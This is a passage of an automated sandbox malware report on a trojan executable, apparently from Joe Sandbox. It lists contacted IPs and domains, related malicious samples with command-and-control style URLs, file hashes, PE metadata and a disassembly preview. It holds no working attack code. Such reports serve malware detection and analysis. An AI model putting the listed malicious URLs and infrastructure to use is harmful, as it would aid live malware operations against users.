                                                                http://www.sandoll.co.krexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.urwpp.deDPleaseexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.zhongyicts.com.cnexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.sakkal.comexplorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  52.58.78.16
                                                                  www.countrywideeconomy.comUnited States
                                                                  16509AMAZON-02UStrue
                                                                  192.64.147.164
                                                                  www.sabaidiving.comUnited States
                                                                  19867VOODOO1UStrue
                                                                  23.227.38.74
                                                                  shops.myshopify.comCanada
                                                                  13335CLOUDFLARENETUStrue
                                                                  192.0.78.24
                                                                  onemoresysadmin.comUnited States
                                                                  2635AUTOMATTICUStrue
                                                                  119.81.45.82
                                                                  onlinecasinocrazy.comSingapore
                                                                  36351SOFTLAYERUStrue
                                                                  198.185.159.144
                                                                  ext-sq.squarespace.comUnited States
                                                                  53831SQUARESPACEUSfalse
                                                                  185.53.177.53
                                                                  www.ricdevan.comGermany
                                                                  61969TEAMINTERNET-ASDEtrue
                                                                  103.15.186.68
                                                                  cityofhouston.infoJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                  34.102.136.180
                                                                  thebenefitssherpa.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  81.88.52.88
                                                                  toypoodlebreedershome.comItaly
                                                                  39729REGISTER-ASITtrue
                                                                  51.222.80.112
                                                                  socialeconomic.netFrance
                                                                  16276OVHFRtrue

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                  Analysis ID:412308
                                                                  Start date:12.05.2021
                                                                  Start time:15:45:53
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 34s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:350969bc_by_Libranalysis (renamed file extension from none to exe)
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:23
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@11/1@12/12
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 18.4% (good quality ratio 16.3%)
                                                                  • Quality average: 73.4%
                                                                  • Quality standard deviation: 32.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 79
                                                                  • Number of non-executed functions: 147
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  Warnings:
                                                                  Show All
                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 92.122.145.220, 13.64.90.137, 13.88.21.125, 20.82.209.183, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  15:46:44API Interceptor1x Sleep call for process: 350969bc_by_Libranalysis.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  52.58.78.16Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                  • www.rjroof.com/bwk/?e0D=4vdMJUauAbypOyncIj3mGOWyxqKYmFP7MPVjyJX0TlZ6LShEClzNARe6HqJLDWz2QsFLyUFcIg==&BRGTb0=DBZH
                                                                  ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                  • www.rafbar.com/u8nw/?hb8Tz=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ0oX9Ljvrcn&yVUx=0BIXczdHaL8h5fn
                                                                  0a97784c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                  • www.bestpontoonboat.com/et9g/?BZ6=bBMyEahAcXigOvOPgDjmms/4cBV9Wtmdu7/aEd/RWaUwIJILZbsGRx753LFyRZeZoLA0QA==&bdC=7njp7th
                                                                  Shipping Document.exeGet hashmaliciousBrowse
                                                                  • www.ehealthwy.com/ou59/?nHLD_b=F/wBt/KMP43Itvrx2w7vOpterTaFFbpTrndkSW8YN3woe1RwD49jldLS4YHInyjjH0Fk&kr4Lhj=ndkHzHd
                                                                  abc73f63_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                  • www.fortwayneduiattorney.com/cca/?LFQLf=DQkKoy4KFmxrpP+4wA/zfG9zgCj3jVN+xnDVxHHDydHerh6N5kUzh47H2mi7uCO64HHP4Q==&PHBtKJ=OlrtB4dp
                                                                  tgix.exeGet hashmaliciousBrowse
                                                                  • www.physicalrobot.com/oerg/?AtxLpld=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&orW=W6L4IdAHz
                                                                  60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • www.relaxxation.com/qjnt/?_nLD=mxaFhsYrAcL/dG/heClqDIL9OHFKPqnw/WCTkSguw47Ni2/IMxTsh2aodb9jmZlwyzTK1xgprg==&m0D=AL30QHY
                                                                  e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • www.vaginalmedicine.com/m3rc/?w8i=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&CR=CpCH
                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                  • www.sanacolitademarijuana.com/u8nw/?GVIp=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFOuaQUe6umYw+kXXjQ==&tzr4=jlIXVLPHc
                                                                  Ygqayrvpsvjdxblkzsmxymjfnxukvrdvft_Signed_.exeGet hashmaliciousBrowse
                                                                  • www.clinics.life/qku9/?sL3x=wPjLqqQ4Fl5oGjCEKguj45taGc7fhq386dHHgSG17iY4BIOMpTzTtH7Yrt22Fdj2vFYG/3Tb+A==&jrq=e4yt
                                                                  pVrqrGltiL.exeGet hashmaliciousBrowse
                                                                  • www.gailrichardson.com/qjnt/?lZ9=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg681sl3dckQEofebx0YA==&G8bDQ=7nJx1RS0B4MT9t
                                                                  krJF4BtzSv.exeGet hashmaliciousBrowse
                                                                  • www.hellonetworker.com/oerg/?r6A=2Id0qd+ugAnFeIUXB+gRuO324HEbs4SrVkFnQshNY9xroxdz4sfjr3km3OeVd011T3tb&YL0=8pN4l4
                                                                  70pGP1JaCf6M0kf.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?Yn=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwF8yKbrEfOE+8NWGOA==&I4=i0GhP0sP
                                                                  AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwGQbJbX8Wtxo
                                                                  triage_dropped_file.exeGet hashmaliciousBrowse
                                                                  • www.gailrichardson.com/qjnt/?rTFDm=GBOxAlxXYbRxGd&r6q=cQpYuVHXbJG9pZu9oJObHgw0bCNAclVj5UnrwSBC7KRToOBRDRnUcBg682AmrtQcdlVJ
                                                                  y6f8O0kbEB.exeGet hashmaliciousBrowse
                                                                  • www.physicalrobot.com/oerg/?mHLD_0=JA3D/Abhc4IR3OQLXeXKb6LQIfBkcHsKg4Z3iScHpk6TVSXolV0c13rIH8GpTmaDfWWP&ndndnZ=UtWlYrO0rhjH
                                                                  PI34567890987.exeGet hashmaliciousBrowse
                                                                  • www.hellojesse.com/uv34/?S0GHnN=RRipariXRTPx&V488O=kz3sMtkI7CkjoxhZIzOZCG4boHCoa7NSqpR26aumet80jxfhILAbk/YVwFwLG6HEIIYv
                                                                  letterhead.exeGet hashmaliciousBrowse
                                                                  • www.adsandbanners.com/epms/?x4uDfZgH=5FcZQLEIPDinAsdvDU7qvUUfCcL2PSB22LbDCeTr+4owrfaQmoWPWt5F0XzMbxfYzfnp&Cj30v=9rJhur7HoF7lOxC
                                                                  PaymentAdvice.exeGet hashmaliciousBrowse
                                                                  • www.wildsoulsport.com/c22b/?Uxlt=kpNK1gW9of23sXec3wB2eGXjTzRpIjACDmlXILuFYpTB5bhnZZGkQZKPt/qXQ/DU3yyv&wP9=mfpP2VH
                                                                  UP3FvzsHWZ.exeGet hashmaliciousBrowse
                                                                  • www.greendaylandscaping.com/r1mo/?uDKH=7Ux04+9wxrtiaQVDDevgGV/B1TtL1QYTp7ylEXK86zgQ//45WeQOOkpXoTmAu+TPv8Ft&-ZPh=1bRpzD

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  ext-sq.squarespace.comPO 367628usa.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  correct invoice.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  SWIFT001411983HNK.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  DOC24457188209927.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  #U4f9b#U5e94#U6750#U6599.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  PO889876.pdf.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  202139769574 Shipping Documents.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  wMqdemYyHm.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  7824,pdf.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  DHL_S390201.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.145
                                                                  triage_dropped_file.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  Wire transfer.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  mC9LnX9aGE.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  4x1cYP0PFs.exeGet hashmaliciousBrowse
                                                                  • 198.49.23.145
                                                                  SO.xlsm.exeGet hashmaliciousBrowse
                                                                  • 198.185.159.144
                                                                  shops.myshopify.comNew_Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  correct invoice.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  New Order.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  slot Charges.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO09641.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PO889876.pdf.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  Order Euro 890,000.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  products order pdf .exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  REVISED ORDER.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  e9777bb4_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  NEW ORDER.exeGet hashmaliciousBrowse
                                                                  • 23.227.38.74
                                                                  PROFORMA INVOICE210505133444.xlsxGet hashmaliciousBrowse
                                                                  • 23.227.38.74

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  AMAZON-02US7bYDInO.rtfGet hashmaliciousBrowse
                                                                  • 52.210.171.182
                                                                  nT5pUwoJSS.dllGet hashmaliciousBrowse
                                                                  • 54.247.61.18
                                                                  1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                  • 44.230.85.241
                                                                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                  • 18.219.49.238
                                                                  main_setup_x86x64.exeGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  A6FAm1ae1j.exeGet hashmaliciousBrowse
                                                                  • 3.138.180.119
                                                                  New_Order.exeGet hashmaliciousBrowse
                                                                  • 75.2.115.196
                                                                  NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                  • 13.58.50.133
                                                                  YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                  • 99.83.175.80
                                                                  yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                  • 99.83.175.80
                                                                  Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  4xPBZai06p.dllGet hashmaliciousBrowse
                                                                  • 13.225.75.73
                                                                  0OyVQNXrTo.exeGet hashmaliciousBrowse
                                                                  • 3.142.167.54
                                                                  rAd00Nae9w.dllGet hashmaliciousBrowse
                                                                  • 13.225.75.73
                                                                  DOC24457188209927.exeGet hashmaliciousBrowse
                                                                  • 13.224.193.2
                                                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  user-invoice-8488888.docGet hashmaliciousBrowse
                                                                  • 104.192.141.1
                                                                  ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                  • 13.113.228.117
                                                                  PO9448882.exeGet hashmaliciousBrowse
                                                                  • 18.219.49.238
                                                                  jjbxg8kh5X.exeGet hashmaliciousBrowse
                                                                  • 52.216.177.83
                                                                  VOODOO1USKqXtlrj1Vk.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  rona.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  winlog.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  Swift File_pdf.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.249
                                                                  Drawings.xlsmGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXEGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  990109.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  Proforma Invoice.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  CSq58hA6nO.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  NQQWym075C.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.164
                                                                  kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                  • 192.64.147.150
                                                                  https://www.dropbox.com/l/AACILqMf9nyLCBAtI7us4fP05O8j3-IIsZkGet hashmaliciousBrowse
                                                                  • 192.64.147.153
                                                                  CLOUDFLARENETUS7bYDInO.rtfGet hashmaliciousBrowse
                                                                  • 104.16.18.94
                                                                  Invoice...exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Tek_multiloader_5.exeGet hashmaliciousBrowse
                                                                  • 162.159.133.233
                                                                  PO 367628usa.exeGet hashmaliciousBrowse
                                                                  • 66.235.200.147
                                                                  Statement of Account April-2021.exeGet hashmaliciousBrowse
                                                                  • 104.21.19.200
                                                                  2070121SN-WS for Woosim i250MSR.pif.exeGet hashmaliciousBrowse
                                                                  • 162.159.133.233
                                                                  FACTURA COMERCIAL_________________________________________________________PDF__.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  Quotation.exeGet hashmaliciousBrowse
                                                                  • 162.159.130.233
                                                                  8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                  • 172.67.150.158
                                                                  GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                  • 104.21.30.57
                                                                  8wx078Pm3P.exeGet hashmaliciousBrowse
                                                                  • 172.67.150.158
                                                                  qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                  • 172.67.151.39
                                                                  viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                  • 104.21.58.140
                                                                  GUaL8Nw228.exeGet hashmaliciousBrowse
                                                                  • 104.21.30.57
                                                                  qn8nIbPPCO.exeGet hashmaliciousBrowse
                                                                  • 104.21.72.139
                                                                  viMLlTHg3d.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  Technical data sheet.exeGet hashmaliciousBrowse
                                                                  • 172.67.188.154
                                                                  8n6dlwyR8l.exeGet hashmaliciousBrowse
                                                                  • 172.67.160.89
                                                                  v8wtfyQr7r.exeGet hashmaliciousBrowse
                                                                  • 104.21.55.224

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.log
                                                                  Process:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1314
                                                                  Entropy (8bit):5.350128552078965
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.871178969852065
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:350969bc_by_Libranalysis.exe
                                                                  File size:924672
                                                                  MD5:350969bc82ec33af12acf100c41eb4d1
                                                                  SHA1:f17d5fc8bad55cc2b523173b43585e9edb9154e4
                                                                  SHA256:961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
                                                                  SHA512:ae62d62e5e71b01a45322dd22eb4a5496b9a96b6443fc8759cd747695565d9e6b65f84da25b44239b65b15e8d615fa0bc8cd94a82351e6f18872d1fc6ee2c506
                                                                  SSDEEP:24576:rcM+tfU+NVmFr2wNV1KEjcZI30ziIwVU:rKgFzNjKEYOEWIwV
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................P..............0... ...@....@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4e30d2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe30800x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x5b4.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xe30640x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
